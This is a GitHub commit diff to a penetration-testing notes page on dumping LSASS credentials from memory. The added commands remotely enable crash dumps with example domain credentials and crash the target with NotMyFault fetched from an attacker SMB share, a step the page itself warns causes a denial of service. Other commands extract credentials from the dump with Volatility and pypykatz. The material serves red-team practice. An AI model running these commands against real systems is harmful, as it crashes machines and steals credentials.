Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
@snovvcrash
snovvcrash committed Nov 27, 2022
1 parent 1a579e1 commit 9f18cbc
Showing 1 changed file with 14 additions and 3 deletions.
17 changes: 14 additions & 3 deletions pentest/infrastructure/ad/credentials-dump/from-memory/lsass-exe.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -323,15 +323,20 @@ chown ${SUDO_USER}:${SUDO_USER} out.bin

- [https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-3-windbg-mimikatz-extension/](https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-3-windbg-mimikatz-extension/)

Get current `CrashControl` settings and set `CrashDumpEnabled` to **0x01** (default dump location is `C:\Windows\MEMORY.dmp`):

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
```

Crash the target machine, e. g. with [NotMyFault](https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault):

{% hint style="warning" %}
**This action causes DOS!** Do at your own risk.
{% endhint %}

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
$ cme smb 192.168.1.1 -u snovvcrash -p 'Passw0rd!' -x '\\10.10.13.37\notmyfaultc64.exe -accepteula /crash 0x03' --no-output
```

Expand All @@ -349,12 +354,17 @@ Parse LSASS with Mimikatz and [WinDbg](https://learn.microsoft.com/en-us/windows
Or with [Pypykatz plugin](https://github.com/skelsec/pypykatz-volatility3) for Volatility 3:

```
$ python3 vol.py -f MEMORY.dmp -p ~/tools/pypykatz-volatility3 pypykatz
$ pip install volatility3 pypykatz
$ git clone https://github.com/volatilityfoundation/volatility3 ~/tools/volatility3
$ git clone https://github.com/skelsec/pypykatz-volatility3 ~/tools/pypykatz-volatility3
$ cd ~/tools/volatility3
$ python3 vol.py -f /path/to/MEMORY.dmp -p ../pypykatz-volatility3 pypykatz
```

{% hint style="info" %}
Current version of `vol_pypykatz.py` need some changes to work with relevant version of Volatility 3:

{% code title="vol_pypykatz.patch" %}
```diff
diff --git a/vol_pypykatz.py b/vol_pypykatz.py
index 6c9592f..f53da1d 100644
Expand Down Expand Up @@ -390,6 +400,7 @@ index 6c9592f..f53da1d 100644
- )
+ return pparser.go_volatility3(self)
```
{% endcode %}
{% endhint %}


Expand Down

0 comments on commit 9f18cbc

Please sign in to comment.